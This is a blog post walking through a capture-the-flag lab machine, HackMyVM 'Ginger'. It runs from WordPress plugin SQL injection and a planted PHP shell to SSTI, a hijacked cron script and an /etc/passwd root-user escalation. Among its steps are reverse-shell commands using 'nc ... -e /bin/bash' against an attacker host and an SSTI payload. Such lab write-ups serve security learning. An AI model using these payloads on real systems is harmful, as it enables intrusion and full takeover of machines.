Windy's little blog

一切生活中的杂七杂八, and I like CTF.

HackMyVm Ginger Walkthrough

HackMyVm Ginger Walkthrough

https://hackmyvm.eu/machines/machine.php?vm=Ginger

Find IP of VM.

 ~ sudo arp-scan --interface eth1 192.168.56.0/24                                                         ...
 192.168.56.100  08:00:27:45:72:fc       PCS Systemtechnik GmbH

Scan ports.

 ~ nmap -sV -sC -p- 192.168.56.100  -oN ports.log
 ...
 PORT   STATE SERVICE VERSION
 22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
 | ssh-hostkey:
 |   2048 0c:3f:13:54:6e:6e:e6:56:d2:91:eb:ad:95:36:c6:8d (RSA)
 |   256 9b:e6:8e:14:39:7a:17:a3:80:88:cd:77:2e:c3:3b:1a (ECDSA)
 |_  256 85:5a:05:2a:4b:c0:b2:36:ea:8a:e2:8a:b2:ef:bc:df (ED25519)
 80/tcp open  http    Apache httpd 2.4.38 ((Debian))
 |_http-server-header: Apache/2.4.38 (Debian)
 |_http-title: Apache2 Debian Default Page: It works
 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel


Scan port 80.

 ~ gobuster dir -u http://192.168.56.100 -t 50  -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt  -x .html,.php,.txt,.php.bak,.bak,.zip -b 401,403,404,500 --wildcard   -o 80.log
 /index.html           (Status: 200) [Size: 10701]
 /wordpress            (Status: 301) [Size: 320] [--> http://192.168.56.100/wordpress/]
 /latest.zip           (Status: 200) [Size: 16866701]


Scan vulnerability of wordpress.

 ~ wpscan --url http://192.168.56.100/wordpress/ -e ap --no-banner --api-token your_wpscan_token --force --plugins-detection aggressive
 ...
 [+] cp-multi-view-calendar
  | Location: http://192.168.56.100/wordpress/wp-content/plugins/cp-multi-view-calendar/
  | Last Updated: 2021-03-08T13:47:00.000Z
  | Readme: http://192.168.56.100/wordpress/wp-content/plugins/cp-multi-view-calendar/README.txt
  | [!] The version is out of date, the latest version is 1.3.99
  | [!] Directory listing is enabled
  |
  | Found By: Known Locations (Aggressive Detection)
  |  - http://192.168.56.100/wordpress/wp-content/plugins/cp-multi-view-calendar/, status: 200
  |
  | [!] 2 vulnerabilities identified:
  |
  | [!] Title: CP Multi View Event Calendar <= 1.1.4 - SQL Injection & XSS
  |     Fixed in: 1.1.5
  |     References:
  |      - https://wpscan.com/vulnerability/50db43be-9fdb-4b5f-bba5-4c0d62689dbf
  |      - https://www.exploit-db.com/exploits/36243/
  |      - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_cp_calendar_sqli/
  |
  | [!] Title: CP Multi View Event Calendar <= 1.1.7 - Unauthenticated SQL Injection
  |     Fixed in: 1.1.8
  |     References:
  |      - https://wpscan.com/vulnerability/3bf2665d-2e2d-4cc4-ac5d-7300e9cb1c11
  |      - https://www.exploit-db.com/exploits/37560/
  |
  | Version: 1.0.2 (50% confidence)
  | Found By: Readme - ChangeLog Section (Aggressive Detection)
  |  - http://192.168.56.100/wordpress/wp-content/plugins/cp-multi-view-calendar/README.txt
 


Seach the exploit in exploitdb.

 ~ searchsploit CP Multi View Event Calendar                                                       fish-0 | 0 [14:21:49]
 ------------------------------------------------------------------------------------- ---------------------------------
  Exploit Title                                                                       |  Path                           ------------------------------------------------------------------------------------- ---------------------------------
 WordPress Plugin CP Multi View Event Calendar 1.01 - SQL Injection                   | php/webapps/35073.txt          
 WordPress Plugin CP Multi View Event Calendar 1.1.7 - SQL Injection                  | php/webapps/37560.txt          
 ------------------------------------------------------------------------------------- ---------------------------------


Check 37560.txt, find the sql injection point, and use sqlmap to dump database.

 ~ sqlmap -u 'http://192.168.56.100/wordpress/?action=data_management&cpmvc_do_action=mvparse&f=edit&id=1'  -p id --risk 3 --level 5 --dbs --batch
 ...
 available databases [2]:
 [*] information_schema
 [*] wordpress_db
 ~ sqlmap -u 'http://192.168.56.100/wordpress/?action=data_management&cpmvc_do_action=mvparse&f=edit&id=1'  -p id --risk 3 --level 5  -D wordpress_db -T wp_users --dump
 ...
 Table: wp_users
 [1 entry]
 +----+-------------------------------+------------------------------------+---------------------+------------+-------------+--------------+---------------+---------------------+---------------------+
 | ID | user_url                      | user_pass                          | user_email          | user_login | user_status | display_name | user_nicename | user_registered     | user_activation_key |
 +----+-------------------------------+------------------------------------+---------------------+------------+-------------+--------------+---------------+---------------------+---------------------+
 | 1  | http://192.168.0.14/wordpress | $P$BsyLMheEjjRPfxertXBQWm6Nq8.YBr. | webmaster@gmail.com | webmaster  | 0           | webmaster    | webmaster     | 2021-06-02 05:28:40 | <blank>             |
 +----+-------------------------------+------------------------------------+---------------------+------------+-------------+--------------+---------------+---------------------+---------------------+


Crack the password hash with john the ripper.

 ~ john --wordlist=/usr/share/wordlists/rock_ascii.txt  hash.txt 
 ~ john --show hash.txt            
 ?:sanitarium


Login wordpress with webmaster:sanitarium, in plugin editor, modify akismet.php, insert shell code.

image-20210609142750078.png


Visit the shell code and get reverse shell.

 ~ curl http://192.168.56.100/wordpress/wp-content/plugins/akismet/akismet.php
 ------------------------------------------------------------------------------------
 ~ nc -nvlp 1234   ...
 Ncat: Connection from 192.168.56.100:34762.
 Linux ginger 4.19.0-16-amd64 #1 SMP Debian 4.19.181-1 (2021-03-19) x86_64 GNU/Linux
  08:28:31 up 14 min,  0 users,  load average: 0.00, 0.05, 0.07
 USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
 uid=33(www-data) gid=33(www-data) groups=33(www-data)
 /bin/sh: 0: can't access tty; job control turned off
 $ id
 uid=33(www-data) gid=33(www-data) groups=33(www-data)


Found 3 users in /home.

 www-data@ginger:/home$ ls -la
 ls -la
 total 20
 drwxr-xr-x  5 root      root      4096 May 21 16:30 .
 drwxr-xr-x 18 root      root      4096 May 19 10:09 ..
 drwxr-xr--  5 caroline  webmaster 4096 May 25 08:15 caroline
 drwxr-xr-x  4 sabrina   sabrina   4096 May 25 08:15 sabrina
 drwx------  4 webmaster webmaster 4096 May 25 08:15 webmaster


Found hint of sabrina.

 www-data@ginger:/home/sabrina$ cat password.txt
 cat password.txt
 I forgot my password again...
 I wrote it down somewhere in this form: sabrina:password
 but I don't know where... I have to search in my memory


Get the password through dmesg.

 www-data@ginger:/home/sabrina$ dmesg |grep sabrina
 dmesg |grep sabrina
 [    6.040104] sabrina:dontforgetyourpasswordbitch


Log in ssh as sabrina, check sudo -l.

 sabrina@ginger:~$ sudo -l
 Matching Defaults entries for sabrina on ginger:
     env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
 
 User sabrina may run the following commands on ginger:
     (webmaster) NOPASSWD: /usr/bin/python /opt/app.py *


Check app.py, it's http server with SSTI on port 5000.

 sabrina@ginger:~$ cat /opt/app.py
 
 from flask import Flask, request, render_template_string,render_template
 
 app = Flask(__name__)
 @app.route('/')
 def hello_ssti():
     person = {'name':"world",'secret':"UGhldmJoZj8gYWl2ZnZoei5wYnovcG5lcnJlZg=="}
     if request.args.get('name'):
         person['name'] = request.args.get('name')
     template = '''<h2>Hello %s!</h2>''' % person['name']
     return render_template_string(template,person=person)
 def get_user_file(f_name):
     with open(f_name) as f:
         return f.readlines()
 app.jinja_env.globals['get_user_file'] = get_user_file
 
 if __name__ == "__main__":
     app.run(debug=True)


Start the server as webmaster.

 sabrina@ginger:~$ sudo -u webmaster python /opt/app.py *
  * Serving Flask app "app" (lazy loading)
  * Environment: production
    WARNING: This is a development server. Do not use it in a production deployment.
    Use a production WSGI server instead.
  * Debug mode: on
  * Running on http://127.0.0.1:5000/ (Press CTRL+C to quit)
  * Restarting with stat
  * Debugger is active!
  * Debugger PIN: 260-511-262


In another terminal, use ssh to port forward port 5000.

 ~ ssh -L 5000:127.0.0.1:5000 sabrina@192.168.56.100


Visit the server with SSTI shell code.

 127.0.0.1:5000/?name={{request.application.__globals__.__builtins__.__import__(%27os%27).popen('nc 192.168.56.150 1234 -e /bin/bash').read()}}


At the same time, use nc to listen to specific port, and get reverse shell as webmaster.

 ~ nc -nlvp 1234                                                                                                                                                                                                          fish-0 | 0 [14:34:52]
 Ncat: Version 7.91 ( https://nmap.org/ncat )
 Ncat: Listening on :::1234
 Ncat: Listening on 0.0.0.0:1234
 Ncat: Connection from 192.168.56.100.
 Ncat: Connection from 192.168.56.100:34772.
 id
 uid=1001(webmaster) gid=1001(webmaster) groups=1001(webmaster)


Upload id_rsa.pub to /home/webmaster/.ssh, change name to authorized_keys and chmod 600.

 webmaster@ginger:/home/sabrina$ cd /home/webmaster
 cd /home/webmaster
 webmaster@ginger:~$ mkdir .ssh
 mkdir .ssh
 webmaster@ginger:~$ cd .ssh
 cd .ssh
 webmaster@ginger:~/.ssh$ wget http://192.168.56.150/id_rsa.pub -O authorized_keys
 ...
 Saving to: ‘authorized_keys’
 authorized_keys     100%[===================>]     565  --.-KB/s    in 0s    
 webmaster@ginger:~/.ssh$ chmod 600 authorized_keys
 chmod 600 authorized_keys


Now we can login ssh as webmaster

 ~ ssh webmaster@192.168.56.100  
 ...
 webmaster@ginger:~$ id
 uid=1001(webmaster) gid=1001(webmaster) groups=1001(webmaster)
 


Upload pspy64 to VM and check it.

 2021/06/09 04:33:01 CMD: UID=1002 PID=883    | /bin/sh -c bash ~/backup/backup.sh  
 2021/06/09 04:33:01 CMD: UID=1002 PID=884    | bash /home/caroline/backup/backup.sh


UID 1002 is user caroline, and the /home/backup folder is writable to webmaster.

 drwxrwx--- 2 caroline webmaster 4096 May 22 13:38 backup


Write bash code into /home/caroine/backup/backup.sh.

 webmaster@ginger:/home/caroline$ echo 'nc 192.168.56.150 1234 -e /bin/bash' > /tmp/backup.sh
 webmaster@ginger:/home/caroline$ rm backup/backup.sh          
 rm: remove write-protected regular file 'backup/backup.sh'? yes
 webmaster@ginger:/home/caroline$ cp /tmp/backup.sh backup/    
 


Then we get reverse shell as caroline. Again, upload id_rsa.pub  and get ssh access. Check sudo -l.

 caroline@ginger:~$ sudo -l
 Matching Defaults entries for caroline on ginger:
     env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
 
 User caroline may run the following commands on ginger:
     (ALL : ALL) NOPASSWD: /srv/code


Disassemble code, it just calls chmod to make passwd writable in 5 seconds.

 int __cdecl main(int argc, const char **argv, const char **envp)
 {
   system("chmod o+w /etc/passwd ; sleep 5 ; chmod o-w /etc/passwd");
   return 0;
 }


In 5 seconds, we write a new root user with password hash into file /etc/passwd.

 caroline@ginger:/srv$ sudo /srv/code &
 [1] 1220
 caroline@ginger:/srv$ echo "root2:lyFyPjK/Mcx0M:0:0:root:/root:/bin/bash" >> /etc/passwd
 caroline@ginger:/srv$ su root2
 Password:
 root@ginger:/srv# id;hostname
 uid=0(root) gid=0(root) groups=0(root)
 ginger
 root@ginger:/srv#


发表评论:

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。

Powered By Z-BlogPHP 1.7.0